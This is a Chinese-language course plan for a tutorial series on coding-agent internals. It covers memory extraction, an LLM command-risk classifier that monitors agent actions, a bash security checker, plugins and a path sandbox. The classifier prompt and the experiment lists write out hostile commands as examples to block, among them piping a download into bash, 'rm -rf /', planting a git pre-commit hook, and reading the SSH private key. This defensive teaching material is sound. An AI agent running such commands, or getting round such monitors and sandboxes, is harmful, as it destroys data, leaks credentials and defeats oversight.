s16"的统一封装。它不是新的核心机制,而是现有机制的组合模式。这种"可组合"的设计让学生理解:好的架构不需要新概念,只需要好的组合方式。 + +**与真实源码的对照**: Claude Code 的 Plugin 系统(`plugins/`)包含: +- `builtinPlugins.ts` — 内置插件注册(`{name}@builtin` 命名) +- `PluginInstallationManager` — Marketplace 插件安装/卸载 +- `pluginOperations.ts` — 插件 CRUD 操作 +- `pluginOptionsStorage.ts` — 插件配置持久化 +- 每个 Plugin 可以提供 `skills`、`hooks`、`mcpServers` 三个维度 +- 用户通过 `/plugin` 命令启用/禁用 + +--- + +### Phase 6 课程总结 + +| 章节 | 核心问题 | 回答 | 新增机制 | 源码对照 | +|------|---------|------|---------|---------| +| **s18** | 怎么让压缩不丢信息? | 结构化记忆提取 | SessionMemory (10 section 模板 + token 预算) | `services/SessionMemory/` (4 文件) | +| **s19** | 怎么让 LLM 分类更准? | 两阶段分类 | FastXMLClassifier + ThinkingClassifier | `utils/permissions/yoloClassifier.ts` (52KB prompt) | +| **s20** | Bash 安全检查到底有多复杂? | 命令解析器级安全 | CommandParser + FlagValidator + GlobDetector | `tools/BashTool/readOnlyValidation.ts` (2000+ 行) | +| **s21** | 怎么统一管理扩展? | 可组合插件 | PluginManager + PluginManifest | `plugins/builtinPlugins.ts` + `services/plugins/` | +| **s22** | 怎么让知识跨会话持久? | 自动记忆提取 | MemoryExtractor (4 种类型 + MEMORY.md 索引) | `services/extractMemories/` + `memdir/` | +| **s23** | 怎么在文件系统层面隔离? 
| 沙箱写保护 | SandboxManager (路径白名单 + denyWrite) | `utils/permissions/pathValidation.ts` + `utils/bash/sandbox-*.ts` | + +### s22: Cross-Session Memory — 让知识跨会话持久 + +**一句话**: s18 的 Session Memory 是"会话内笔记",s22 的 Memory 是"跨会话知识库"。 + +s18 的 Session Memory 在对话结束时就消失了(或随 compact 重新初始化)。真实 Claude Code 有一个完全独立的记忆系统,从对话中**自动提取**关键知识,写入磁盘,**下次对话自动加载**。 + +s22 引入 `MemoryExtractor` + `MemoryStore`: + +``` +对话结束 (query loop 完成) + │ + ▼ +[extractMemories 触发] + │ Forked agent 分析对话 + │ 识别可持久化的知识 + │ + ▼ +[写入 memory 文件] + │ + ├── ~/.claude/projects/{path}/memory/ + │ ├── MEMORY.md ← 索引文件 + │ ├── user_preferences.md ← 用户偏好 + │ ├── feedback_rules.md ← 用户纠正的规则 + │ ├── project_context.md ← 项目上下文 + │ └── reference_links.md ← 外部引用 + │ + ▼ +[下次对话启动] + │ 读取 MEMORY.md 索引 + │ 注入到系统提示 + │ + ▼ +Agent 已经"记住"了上次学到的知识 +``` + +**4 种记忆类型**: + +| 类型 | 文件名 | 内容 | 示例 | +|------|--------|------|------| +| user | `user_*.md` | 用户角色、偏好、工作习惯 | "用户是数据科学家,偏好 Python" | +| feedback | `feedback_*.md` | 用户纠正的规则(做/不做) | "不要 mock 数据库,用真实连接" | +| project | `project_*.md` | 项目上下文、架构决策 | "认证中间件因合规要求重写" | +| reference | `reference_*.md` | 外部系统指针 | "Pipeline bug 追踪在 Linear INGEST 项目" | + +**MEMORY.md 索引文件**: +- 不是记忆内容本身,而是索引 +- 每条一行:`- [标题](文件名) — 一行摘要` +- 不超过 200 行,超出截断 +- 下次对话时自动加载到系统提示 + +**自动提取触发条件**: +- 每次 query loop 结束时检查 +- 只在主 agent 运行(subagent 不提取) +- 有 feature gate 控制(`tengu_passport_quail`) +- 并发安全:`inProgress` 锁 + trailing extraction + +**关键洞察**: Memory 是 Agent 的"长期记忆",Session Memory 是"短期记忆"。一个好的 Agent 需要两层:短期记住"现在在做什么",长期记住"学到了什么"。 + +**与真实源码的对照**: Claude Code 的记忆系统包括: +- `services/extractMemories/extractMemories.ts` — 主提取逻辑 + - 在 query loop 结束时触发(fire-and-forget) + - Forked agent 分析对话,用 LLM 判断哪些信息值得记住 + - 写入 `~/.claude/projects/{path}/memory/` 目录 + - `drainPendingExtraction()` 确保关机前完成 +- `services/extractMemories/prompts.ts` — 提取 prompt +- `memdir/` — 记忆目录管理、老化、相关性评分 +- 4 种记忆类型:user / feedback / project / reference +- `MEMORY.md` 索引:最多 200 行,每条 `< 150 字符` + +--- + +### s23: Sandbox — 文件系统级隔离 + +**一句话**: s12 
用 git worktree 做了目录隔离,s23 用沙箱做写路径隔离。 + +s13 的权限守卫控制"能不能执行",但没有控制"能写哪些文件"。真实 Claude Code 在执行 bash 命令时有一个沙箱层,限制 agent 只能在白名单路径内写文件。 + +s23 引入 `SandboxManager`: + +``` +命令准备执行 + │ + ▼ +[写路径提取] + │ 从命令中提取目标路径 + │ mkdir → 路径参数 + │ cp/mv → 目标路径 + │ echo > → 重定向路径 + │ + ▼ +[沙箱白名单检查] + │ 允许的路径: + │ ├── . (当前工作目录) + │ ├── /tmp/claude/ (临时目录) + │ └── 用户配置的额外路径 + │ + ├─ 路径在白名单内 → 允许 + ├─ 路径在白名单外 → 拒绝 + └─ 沙箱禁用 → 全部允许 +``` + +**沙箱 vs Worktree 的区别**: + +| 维度 | Worktree (s12) | Sandbox (s23) | +|------|---------------|---------------| +| 隔离方式 | 完整目录拷贝 | 写路径白名单 | +| 粒度 | 目录级 | 路径级 | +| 场景 | 多 agent 并行开发 | 单 agent 写保护 | +| 成本 | 高(git worktree) | 低(路径检查) | +| 可组合 | 可以嵌套 | 可以嵌套 | + +**关键洞察**: 沙箱不是"你不能做",而是"你只能在这些范围内做"。好的沙箱给 agent 足够的自由度(在项目目录内自由操作),同时保护关键路径(/etc/、~/.ssh/、其他项目目录)。 + +**与真实源码的对照**: Claude Code 的沙箱系统分布在: +- `utils/permissions/pathValidation.ts` — 路径验证和沙箱白名单 + - `pathInAllowedWorkingPath()` — 检查路径是否在白名单内 + - `checkWritablePath()` — 统一写路径检查入口 + - 沙箱白名单默认包含 cwd(`.`) + - 用户可通过配置添加额外路径 +- `utils/bash/sandbox-adapter.ts` — 沙箱适配器 +- 与 readOnlyValidation 联动:只读命令不需要沙箱检查 +- SandboxManager 是全局单例,跟踪启用/禁用状态 + +--- + +## Phase 6 后端课程文件 (Python) + +### 【模块 J】s18: Session Memory (会话记忆) + +**文件**: `agents/s18_session_memory.py` +**预计行数**: ~350 行 +**依赖**: s06 + +#### 核心类 + +```python +SESSION_MEMORY_TEMPLATE = """# Session Title +_A short 5-10 word description_ + +# Current State +_What is being worked on right now_ + +# Task Specification +_What did the user ask to build_ + +# Files and Functions +_Important files and what they contain_ + +# Workflow +_Common commands and their order_ + +# Errors & Corrections +_Errors encountered and fixes_ + +# Codebase Documentation +_System components and how they fit_ + +# Learnings +_What worked, what didn't_ + +# Key Results +_Important outputs_ + +# Worklog +_Step by step summary_ +""" + +class SessionMemoryManager: + def __init__(self, memory_dir: Path = None): + self._dir = memory_dir or WORKDIR / ".session-memory" + 
self._dir.mkdir(exist_ok=True)
+        self._memory_file = self._dir / "session-memory.md"
+        self._last_message_id: str | None = None
+        self._tokens_at_last_extraction = 0
+        self._initialized = False
+
+    # 配置阈值
+    MIN_TOKENS_TO_INIT = 10000        # 初始化阈值
+    MIN_TOKENS_BETWEEN_UPDATE = 5000  # 增量更新阈值
+    MAX_SECTION_TOKENS = 2000         # 单 section 上限
+    MAX_TOTAL_TOKENS = 12000          # 总 token 上限
+
+    def should_extract(self, current_tokens: int, tool_calls: int) -> bool:
+        if not self._initialized:
+            return current_tokens >= self.MIN_TOKENS_TO_INIT
+        growth = current_tokens - self._tokens_at_last_extraction
+        return growth >= self.MIN_TOKENS_BETWEEN_UPDATE
+
+    def extract(self, messages: list, client, model) -> None:
+        """用 LLM 从对话中提取结构化笔记"""
+        current = self._memory_file.read_text() if self._memory_file.exists() else SESSION_MEMORY_TEMPLATE
+        prompt = self._build_extraction_prompt(current, messages)
+        # 使用 forked agent 执行提取
+        response = client.messages.create(
+            model=model, max_tokens=4096,
+            messages=[{"role": "user", "content": prompt}],
+            tools=[EDIT_TOOL_SCHEMA],
+        )
+        # 处理 Edit 工具调用来更新 session-memory.md
+        self._apply_edits(response)
+        self._tokens_at_last_extraction = self._estimate_tokens(messages)
+        self._initialized = True
+
+    def get_content(self) -> str | None:
+        if not self._memory_file.exists():
+            return None
+        content = self._memory_file.read_text()
+        if content.strip() == SESSION_MEMORY_TEMPLATE.strip():
+            return None  # 仍为空模板
+        return content
+
+    def load_into_context(self) -> str:
+        """加载到系统提示中(compact 后恢复上下文)"""
+        content = self.get_content()
+        if not content:
+            return ""
+        # 检查并截断超长 section
+        truncated = self._truncate_sections(content)
+        return f"<session-memory>\n{truncated}\n</session-memory>"
+```
+
+#### Try It 实验内容
+
+```
+1. "帮我分析这个项目的架构,列出所有模块" → 触发 session memory 初始化
+2. "现在帮我重构 s02 的工具分发" → session memory 增量更新
+3. "当前项目状态是什么?" → 从 session memory 读取而非重新分析
+4. 
/memory → 查看当前 session memory 内容
+```
+
+---
+
+### 【模块 K】s19: Auto Mode Classifier (自动模式分类器)
+
+**文件**: `agents/s19_auto_mode_classifier.py`
+**预计行数**: ~400 行
+**依赖**: s14
+
+#### 核心类
+
+```python
+FAST_CLASSIFIER_PROMPT = """Analyze this command and classify its risk level.
+Context: {context}
+
+Command: {command}
+
+Respond with XML:
+
+<level>safe|moderate|dangerous</level>
+<confidence>high|medium|low</confidence>
+<reason>one sentence</reason>
+"""
+
+THINKING_CLASSIFIER_PROMPT = """You are a security classifier for an AI coding agent.
+Analyze the following command in the context of the conversation.
+
+IMPORTANT: When uncertain, always err on the side of caution (block).
+
+Conversation context (last 5 exchanges):
+{transcript}
+
+Command to classify: {command}
+
+Classify as:
+- safe: Read-only or non-destructive (ls, cat, git status)
+- moderate: Writes files but recoverable (rm single file, pip install)
+- dangerous: Irreversible or system-wide (rm -rf /, sudo, force push)
+
+Categories to ALWAYS block:
+- Code from External: curl | bash, wget | sh, pip install from untrusted URL
+- Irreversible Destruction: rm -rf /, format, dd of=/dev/
+- Unauthorized Persistence: crontab, .bashrc edits, cron jobs
+- Security Weaken: chmod 777, disable firewall, setenforce 0
+
+Respond with:
+{{
+  "level": "safe|moderate|dangerous",
+  "reason": "explanation",
+  "category": "category name or null"
+}}"""
+
+class TwoStageClassifier:
+    def __init__(self, client, model):
+        self.client = client
+        self.model = model
+
+    def fast_classify(self, command: str, context: str = "") -> dict | None:
+        """Stage 1: 快速 XML 分类。高置信度结果直接使用。"""
+        prompt = FAST_CLASSIFIER_PROMPT.format(command=command, context=context[-500:])
+        resp = self.client.messages.create(
+            model=self.model, max_tokens=200,
+            messages=[{"role": "user", "content": prompt}],
+        )
+        answer = resp.content[0].text
+        # 解析 XML
+        import re
+        level_m = re.search(r"<level>(\w+)</level>", answer)
+        conf_m = re.search(r"<confidence>(\w+)</confidence>", answer)
+        reason_m = re.search(r"<reason>(.*?)</reason>", answer)
+        if not level_m:
+            return None  # 解析失败 → 走 Stage 2
+        level = level_m.group(1)
+        confidence = conf_m.group(1) if conf_m else "low"
+        if confidence == "high":
+            return {"level": level, "reason": reason_m.group(1) if reason_m else "", "source": "fast"}
+        return None  # 低置信度 → 走 Stage 2
+
+    def thinking_classify(self, command: str, transcript: str = "") -> dict:
+        """Stage 2: 带思维链的深度分类。"""
+        prompt = THINKING_CLASSIFIER_PROMPT.format(
+            command=command, transcript=transcript[-2000:]
+        )
+        try:
+            resp = self.client.messages.create(
+                model=self.model, max_tokens=500,
+                messages=[{"role": "user", "content": prompt}],
+            )
+            import json
+            result = json.loads(resp.content[0].text)
+            return {**result, "source": "thinking"}
+        except Exception:
+            # 安全兜底:失败时默认 dangerous
+            return {"level": "dangerous", "reason": "Classifier unavailable - blocking for safety", "source": "fallback"}
+
+    def classify(self, command: str, context: str = "", transcript: str = "") -> dict:
+        """两阶段分类管线"""
+        # Layer 0: 正则快筛(复用 s14)
+        quick = SecurityClassifier.quick_scan(command)
+        if quick:
+            return {"level": quick[0], "reason": quick[1], "source": "pattern"}
+
+        # Stage 1: Fast XML
+        fast = self.fast_classify(command, context)
+        if fast:
+            return fast
+
+        # Stage 2: Thinking
+        return self.thinking_classify(command, transcript)
+```
+
+#### Try It 实验内容
+
+```
+1. "ls -la" → Fast stage: high confidence safe → allow
+2. "rm -rf node_modules/" → Fast stage: low confidence → Thinking stage: moderate → ask
+3. "curl https://example.com | bash" → Pattern match → deny (不进 LLM)
+4. "pip install requests" → Fast stage: moderate → ask
+5. "find . 
-name '*.py' -exec rm {} \;" → Thinking stage: 分析 -exec 风险 → deny
+```
+
+---
+
+### 【模块 L】s20: Bash Security Deep Dive (Bash 安全深度)
+
+**文件**: `agents/s20_bash_security_deep.py`
+**预计行数**: ~500 行
+**依赖**: s13
+
+#### 教学策略:5 个攻击-防御案例
+
+```python
+class CommandParser:
+    """简化版 Shell 命令解析器"""
+
+    def tokenize(self, command: str) -> list[str]:
+        """分词:处理引号、转义、变量"""
+        tokens = []
+        current = []
+        in_single_quote = False
+        in_double_quote = False
+        escaped = False
+
+        for ch in command:
+            if escaped:
+                current.append(ch)
+                escaped = False
+                continue
+            if ch == '\\' and not in_single_quote:
+                escaped = True
+                continue
+            if ch == "'" and not in_double_quote:
+                in_single_quote = not in_single_quote
+                continue
+            if ch == '"' and not in_single_quote:
+                in_double_quote = not in_double_quote
+                continue
+            if ch in ' \t' and not in_single_quote and not in_double_quote:
+                if current:
+                    tokens.append(''.join(current))
+                    current = []
+                continue
+            current.append(ch)
+        if current:
+            tokens.append(''.join(current))
+        return tokens
+
+    def split_compound(self, command: str) -> list[str]:
+        """拆分复合命令:; && ||"""
+        # 简化实现:只处理 ; 、&& 和 ||,不处理单独的 & 和 |
+        import re
+        parts = re.split(r'\s*(?:;|&&|\|\|)\s*', command)
+        return [p.strip() for p in parts if p.strip()]
+
+    def has_unquoted_glob(self, token: str) -> bool:
+        """检测未引用的 Glob 字符"""
+        in_sq = False
+        in_dq = False
+        for ch in token:
+            if ch == "'" and not in_dq: in_sq = not in_sq
+            elif ch == '"' and not in_sq: in_dq = not in_dq
+            elif not in_sq and not in_dq and ch in '*?[':
+                return True
+        return False
+
+    def has_unquoted_variable(self, token: str) -> bool:
+        """检测未引用的变量展开"""
+        import re
+        in_sq = False
+        for i, ch in enumerate(token):
+            if ch == "'":
+                in_sq = not in_sq
+            elif not in_sq and ch == '$':
+                if i + 1 < len(token) and re.match(r'[A-Za-z_@*#?!$0-9-]', token[i + 1]):
+                    return True
+        return False
+
+
+class BashSecurityChecker:
+    """基于命令解析的深度安全检查"""
+
+    COMMAND_ALLOWLIST = {
+        "ls": {"flags": ["-l", "-a", "-la", "-R", "-1", "--color"]},
+ "cat": {"flags": ["-n", "-b", "-s"]}, + "head": {"flags": ["-n", "-c"]}, + "tail": {"flags": ["-n", "-c", "-f"]}, + "git": {"subcommands": ["status", "log", "diff", "branch", "show", "blame"]}, + "grep": {"flags": ["-r", "-i", "-n", "-c", "-l", "-v", "-E"]}, + "find": {"blocked_flags": ["-exec", "-execdir", "-delete", "-ok"]}, + } + + GIT_INTERNAL_PATHS = ["HEAD", "objects/", "refs/", "hooks/"] + + def check(self, command: str) -> dict: + parser = CommandParser() + subcommands = parser.split_compound(command) + + # 案例 1: 复合命令逐条检查 + has_git = any(sc.strip().startswith("git") for sc in subcommands) + has_cd = any(sc.strip().startswith("cd") for sc in subcommands) + + # 案例 3: cd + git 组合检测 + if has_cd and has_git: + return {"safe": False, "reason": "cd + git combo: potential sandbox escape via cd to malicious dir"} + + for subcmd in subcommands: + tokens = parser.tokenize(subcmd) + if not tokens: + continue + + # 案例 2: Glob 检测 + for token in tokens[1:]: + if parser.has_unquoted_glob(token): + return {"safe": False, "reason": f"Unquoted glob in '{token}': could expand to dangerous args"} + if parser.has_unquoted_variable(token): + return {"safe": False, "reason": f"Unquoted variable in '{token}': could expand to anything"} + + # 白名单检查 + base = tokens[0] + if base in self.COMMAND_ALLOWLIST: + config = self.COMMAND_ALLOWLIST[base] + if "flags" in config: + for flag in tokens[1:]: + if flag.startswith("-") and flag not in config["flags"]: + return {"safe": False, "reason": f"Flag '{flag}' not in allowlist for {base}"} + + # 案例 4: Git 内部路径检测 + for token in tokens: + for pattern in self.GIT_INTERNAL_PATHS: + if pattern in token: + return {"safe": False, "reason": f"Git internal path '{pattern}' detected: potential hook injection"} + + return {"safe": True, "reason": ""} +``` + +#### 5 个攻击-防御实验 + +``` +1. "ls; rm -rf /" → 复合命令拆分 → rm -rf / 被 deny +2. "echo *.py > output.txt" → Glob 检测 → 阻止(* 可能展开) +3. "cd /tmp/evil && git status" → cd + git 组合 → 阻止 +4. 
"mkdir hooks && echo '#!' > hooks/pre-commit && git status"
+   → Git 内部路径写检测 → 阻止
+5. "cat $HOME/.ssh/id_rsa" → 变量展开检测 → 阻止($ 未引用)
+```
+
+---
+
+### 【模块 M】s21: Plugin System (插件系统)
+
+**文件**: `agents/s21_plugin_system.py`
+**预计行数**: ~300 行
+**依赖**: s05, s15, s16
+
+#### 核心类
+
+```python
+import json
+from dataclasses import dataclass, field
+from pathlib import Path
+
+@dataclass
+class PluginManifest:
+    name: str
+    version: str
+    description: str
+    skills: list[str] = field(default_factory=list)
+    hooks: dict[str, str] = field(default_factory=dict)  # event -> handler script
+    mcp_servers: dict[str, dict] = field(default_factory=dict)  # server_name -> config
+
+class PluginManager:
+    def __init__(self, plugins_dir: Path = None):
+        self._dir = plugins_dir or WORKDIR / ".plugins"
+        self._dir.mkdir(exist_ok=True)
+        self._plugins: dict[str, PluginManifest] = {}
+        self._enabled: set[str] = set()
+        self._settings_file = self._dir / "settings.json"
+
+    def discover(self) -> list[PluginManifest]:
+        """扫描插件目录,加载所有 manifest.json"""
+        manifests = []
+        for plugin_dir in sorted(self._dir.iterdir()):
+            manifest_path = plugin_dir / "manifest.json"
+            if manifest_path.exists():
+                data = json.loads(manifest_path.read_text())
+                m = PluginManifest(
+                    name=data["name"], version=data.get("version", "1.0.0"),
+                    description=data.get("description", ""),
+                    skills=data.get("skills", []),
+                    hooks=data.get("hooks", {}),
+                    mcp_servers=data.get("mcpServers", {}),
+                )
+                self._plugins[m.name] = m
+                manifests.append(m)
+        self._load_settings()
+        return manifests
+
+    def enable(self, name: str) -> bool:
+        if name in self._plugins:
+            self._enabled.add(name)
+            self._save_settings()
+            return True
+        return False
+
+    def disable(self, name: str) -> bool:
+        if name in self._enabled:
+            self._enabled.discard(name)
+            self._save_settings()
+            return True
+        return False
+
+    def _load_settings(self) -> None:
+        # 注:原稿未给出 settings 读写实现,以下为最小补全(假设 JSON 记录 enabled 列表)
+        if self._settings_file.exists():
+            data = json.loads(self._settings_file.read_text())
+            self._enabled = set(data.get("enabled", []))
+
+    def _save_settings(self) -> None:
+        # 注:原稿未给出,与 _load_settings 配对的最小补全
+        self._settings_file.write_text(json.dumps({"enabled": sorted(self._enabled)}))
+
+    def get_skills(self) -> list[dict]:
+        """返回所有已启用插件的 Skills"""
+        skills = []
+        for name in self._enabled:
+            plugin = self._plugins.get(name)
+            if not plugin:
+                continue
+            for skill_file in plugin.skills:
+                skill_path = 
self._dir / name / skill_file
+                if skill_path.exists():
+                    skills.append({
+                        "name": f"{name}:{skill_path.stem}",  # skill_file 是 str,取 stem 需用 Path
+                        "description": skill_path.read_text()[:200],
+                        "plugin": name,
+                        "path": str(skill_path),
+                    })
+        return skills
+
+    def get_hooks(self) -> dict[str, list]:
+        """返回所有已启用插件的 Hooks"""
+        hooks = {}
+        for name in self._enabled:
+            plugin = self._plugins.get(name)
+            if not plugin:
+                continue
+            for event, script in plugin.hooks.items():
+                hooks.setdefault(event, []).append({
+                    "plugin": name,
+                    "script": str(self._dir / name / script),
+                })
+        return hooks
+
+    def list_plugins(self) -> str:
+        lines = []
+        for name, m in self._plugins.items():
+            status = "enabled" if name in self._enabled else "disabled"
+            skills_count = len(m.skills)
+            hooks_count = len(m.hooks)
+            mcp_count = len(m.mcp_servers)
+            lines.append(f"  {name} v{m.version} [{status}]")
+            lines.append(f"    {m.description}")
+            lines.append(f"    skills: {skills_count}, hooks: {hooks_count}, mcp: {mcp_count}")
+        return "\n".join(lines)
+```
+
+#### Try It 实验内容
+
+```
+1. /plugin list → 查看已安装插件
+2. /plugin enable db-assistant → 启用插件(加载 skills + hooks + MCP)
+3. "帮我查一下 users 表有多少行" → 插件的 MCP 工具被调用
+4. /plugin disable db-assistant → 禁用插件
+5. 
/plugin install code-reviewer → 从目录安装新插件 +``` + +--- + +## Phase 6 前端更新 + +### constants.ts 新增 + +```typescript +// VERSION_META 新增 s18-s21 +s18: { + title: "Session Memory", + subtitle: "Compression That Doesn't Lose Information", + coreAddition: "SessionMemoryManager with 10-section template and token budget", + keyInsight: "上下文管理的终极形态不是压缩而是提取 — 压缩是被动防御,提取是主动积累", + layer: "production", + prevVersion: "s06", +}, +s19: { + title: "Auto Mode Classifier", + subtitle: "Two-Stage LLM Security Classification", + coreAddition: "TwoStageClassifier: Fast XML + Thinking deep analysis", + keyInsight: "生产级分类器的核心是安全兜底 + 成本优化:80% 简单判断 Fast 处理,20% 复杂情况 Thinking 处理", + layer: "production", + prevVersion: "s14", +}, +s20: { + title: "Bash Security Deep Dive", + subtitle: "2000 Lines of Safety Checks Decomposed", + coreAddition: "CommandParser + FlagValidator + GlobDetector + GitPathProtection", + keyInsight: "安全检查的敌人不是危险命令,而是看起来无害但能被组合利用的命令", + layer: "production", + prevVersion: "s13", +}, +s21: { + title: "Plugin System", + subtitle: "Skills, Hooks, and MCP in One Container", + coreAddition: "PluginManager with manifest-based skill/hook/MCP composition", + keyInsight: "Plugin 不是新概念而是现有机制的组合模式 — 好的架构不需要新概念只需要好的组合", + layer: "production", + prevVersion: "s05", +}, +s22: { + title: "Cross-Session Memory", + subtitle: "Knowledge That Survives Conversations", + coreAddition: "MemoryExtractor + MemoryStore with 4 memory types and MEMORY.md index", + keyInsight: "Memory 是 Agent 的长期记忆,Session Memory 是短期记忆 — 好的 Agent 需要两层", + layer: "production", + prevVersion: "s18", +}, +s23: { + title: "Sandbox Isolation", + subtitle: "Filesystem-Level Write Protection", + coreAddition: "SandboxManager with path whitelist and denyWrite enforcement", + keyInsight: "沙箱不是你不能做,而是你只能在这些范围内做", + layer: "production", + prevVersion: "s13", +}, +``` + +### Layer 更新 + +```typescript +{ id: "production", label: "Production Patterns", color: "#EC4899", versions: ["s18", "s19", "s20", "s21", "s22", "s23"] }, +``` 
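
`VERSION_META` 与 Layer 配置是两份需要手工保持同步的数据,新增 s18-s23 时很容易只改一处。下面是一段示意性的校验代码(注意:`Layer`、`VersionMeta` 的类型形状按上文片段假设,`validateLayerCoverage` 为本文虚构的辅助函数,并非真实源码),可以在构建或测试阶段捕获"新增章节忘记登记 layer"这类失误:

```typescript
// 类型形状按上文 constants.ts 片段假设
type Layer = { id: string; label: string; color: string; versions: string[] };
type VersionMeta = Record<string, { title: string; layer: string; prevVersion?: string }>;

// 校验:每个 version 声明的 layer 必须存在,且该 layer 的 versions 列表里也登记了它
function validateLayerCoverage(meta: VersionMeta, layers: Layer[]): string[] {
  const errors: string[] = [];
  const layerById = new Map<string, Layer>(layers.map((l) => [l.id, l]));
  for (const [version, entry] of Object.entries(meta)) {
    const layer = layerById.get(entry.layer);
    if (!layer) {
      errors.push(`${version}: unknown layer "${entry.layer}"`);
    } else if (!layer.versions.includes(version)) {
      errors.push(`${version}: missing from layer "${entry.layer}".versions`);
    }
  }
  return errors;
}

// 最小用例:s18/s19 已正确登记到 production layer
const layers: Layer[] = [
  { id: "production", label: "Production Patterns", color: "#EC4899", versions: ["s18", "s19"] },
];
const meta: VersionMeta = {
  s18: { title: "Session Memory", layer: "production", prevVersion: "s06" },
  s19: { title: "Auto Mode Classifier", layer: "production", prevVersion: "s14" },
};
console.log(validateLayerCoverage(meta, layers)); // []
```

若校验返回非空列表,可以让 CI 直接报错,避免前端新增章节时遗漏注册。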
+ +### 国际化更新 (三语) + +```json +{ + "sessions": { + "s18": "Session Memory / 会话记忆", + "s19": "Auto Mode Classifier / 自动模式分类器", + "s20": "Bash Security Deep Dive / Bash 安全深度", + "s21": "Plugin System / 插件系统", + "s22": "Cross-Session Memory / 跨会话记忆", + "s23": "Sandbox Isolation / 沙箱隔离" + }, + "layer_labels": { + "production": "Production Patterns / 生产模式" + }, + "viz": { + "s18": "Session Memory Extraction Pipeline", + "s19": "Two-Stage Classifier Flow", + "s20": "Command Parser Security Pipeline", + "s21": "Plugin Architecture Overview", + "s22": "Cross-Session Memory Lifecycle", + "s23": "Sandbox Path Validation" + } +} +``` + +--- + +## Phase 6 分工建议 + +| 模块 | 标签 | 工作量 | 依赖 | +|------|------|--------|------| +| **J** | s18 Session Memory | ~350 行 Python + 3 篇文档 + 可视化 | s06 完成 | +| **K** | s19 Auto Mode Classifier | ~400 行 Python + 3 篇文档 + 可视化 | s14 完成 | +| **L** | s20 Bash Security Deep Dive | ~500 行 Python + 3 篇文档 + 可视化 | s13 完成 | +| **M** | s21 Plugin System | ~300 行 Python + 3 篇文档 + 可视化 | s05 + s15 + s16 完成 | +| **N** | s22 Cross-Session Memory | ~350 行 Python + 3 篇文档 + 可视化 | s18 完成 | +| **O** | s23 Sandbox Isolation | ~250 行 Python + 3 篇文档 + 可视化 | s13 完成 | + +### 执行顺序 + +``` +Phase 5 完成后: + +Week 1: + J(s18) — Session Memory [可独立开发] + K(s19) — Auto Mode Classifier [可独立开发] + O(s23) — Sandbox Isolation [可独立开发,轻量级] + +Week 2: + L(s20) — Bash Security Deep [可独立开发] + M(s21) — Plugin System [依赖 s15 + s16] + N(s22) — Cross-Session Memory [依赖 s18] + +Week 3: + 前端可视化 (6 个新组件) + 文档 (18 篇 Markdown) + s_full.py 更新 + 集成测试 +``` + +--- + +### 【模块 N】s22: Cross-Session Memory (跨会话持久记忆) + +**文件**: `agents/s22_cross_session_memory.py` +**预计行数**: ~350 行 +**依赖**: s18 + +#### 核心类 + +```python +MEMORY_TYPES = ("user", "feedback", "project", "reference") + +@dataclass +class MemoryEntry: + name: str + type: str # user / feedback / project / reference + description: str # 一行摘要,< 150 字符 + content: str # 完整内容 + file_path: Path # 对应的 .md 文件路径 + +class MemoryStore: + """跨会话持久记忆存储""" + + 
MAX_INDEX_LINES = 200 + + def __init__(self, memory_dir: Path = None): + self._dir = memory_dir or Path.home() / ".learn-claude-code" / "memory" + self._dir.mkdir(parents=True, exist_ok=True) + self._index = self._dir / "MEMORY.md" + + def write_memory(self, entry: MemoryEntry) -> None: + """写入记忆文件""" + # 文件名格式: {type}_{name}.md + filename = f"{entry.type}_{entry.name}.md" + path = self._dir / filename + # 写入 frontmatter + 内容 + content = f"---\nname: {entry.name}\ndescription: {entry.description}\ntype: {entry.type}\n---\n\n{entry.content}" + path.write_text(content) + # 更新索引 + self._update_index() + + def _update_index(self) -> None: + """重建 MEMORY.md 索引""" + lines = ["# Memory Index\n"] + for f in sorted(self._dir.glob("*.md")): + if f.name == "MEMORY.md": + continue + frontmatter = self._parse_frontmatter(f) + if frontmatter: + desc = frontmatter.get("description", "") + lines.append(f"- [{frontmatter['name']}]({f.name}) — {desc}\n") + # 截断到 200 行 + content = "".join(lines[:self.MAX_INDEX_LINES]) + self._index.write_text(content) + + def load_for_context(self) -> str: + """加载索引到系统提示(下次对话时调用)""" + if not self._index.exists(): + return "" + return self._index.read_text() + + def list_memories(self) -> str: + """列出所有记忆""" + if not self._index.exists(): + return "No memories stored yet." + return self._index.read_text() + + def _parse_frontmatter(self, path: Path) -> dict | None: + """解析 YAML frontmatter""" + text = path.read_text() + if not text.startswith("---"): + return None + end = text.find("---", 3) + if end < 0: + return None + frontmatter = {} + for line in text[3:end].strip().split("\n"): + if ":" in line: + key, _, value = line.partition(":") + frontmatter[key.strip()] = value.strip() + return frontmatter + + +class MemoryExtractor: + """从对话中自动提取记忆""" + + EXTRACTION_PROMPT = """Analyze the conversation above and extract knowledge worth remembering across sessions. + +Write each piece of knowledge as a separate memory file. For each memory: +1. 
Choose a type: user, feedback, project, or reference
+2. Write a short name (snake_case, e.g. "prefer_real_db")
+3. Write a one-line description (< 150 chars)
+4. Write the full content
+
+Types:
+- user: User's role, preferences, working style
+- feedback: Rules about what to do/avoid (from corrections)
+- project: Architecture decisions, constraints, deadlines
+- reference: Pointers to external systems (Linear boards, dashboards)
+
+Use the write_memory tool for each piece of knowledge. Make 1-3 calls.
+If nothing worth remembering, make zero calls and stop."""
+
+    def __init__(self, store: MemoryStore, client, model):
+        self.store = store
+        self.client = client
+        self.model = model
+
+    def extract(self, messages: list) -> None:
+        """在 query loop 结束时触发,用 LLM 提取记忆"""
+        # 构建上下文:最近的消息
+        recent = messages[-10:] if len(messages) > 10 else messages
+        context_text = self._format_messages(recent)
+        prompt = self.EXTRACTION_PROMPT + "\n\nConversation:\n" + context_text
+
+        # 使用 forked agent 执行(受限工具集:只有 write_memory)
+        response = self.client.messages.create(
+            model=self.model, max_tokens=2000,
+            tools=[self._write_memory_tool_schema()],
+            messages=[{"role": "user", "content": prompt}],
+        )
+        # 处理 write_memory 工具调用
+        for block in response.content:
+            if block.type == "tool_use" and block.name == "write_memory":
+                entry = MemoryEntry(
+                    name=block.input["name"],
+                    type=block.input["type"],
+                    description=block.input["description"],
+                    content=block.input["content"],
+                    file_path=self.store._dir / f"{block.input['type']}_{block.input['name']}.md",
+                )
+                self.store.write_memory(entry)
+
+    def _format_messages(self, messages: list) -> str:
+        # 注:原稿未给出该辅助方法,以下为最小补全
+        lines = []
+        for m in messages:
+            content = m["content"] if isinstance(m["content"], str) else str(m["content"])
+            lines.append(f"[{m['role']}] {content}")
+        return "\n".join(lines)
+
+    def _write_memory_tool_schema(self) -> dict:
+        # 注:原稿未给出该辅助方法,以下为最小补全(标准 tool 定义格式)
+        return {
+            "name": "write_memory",
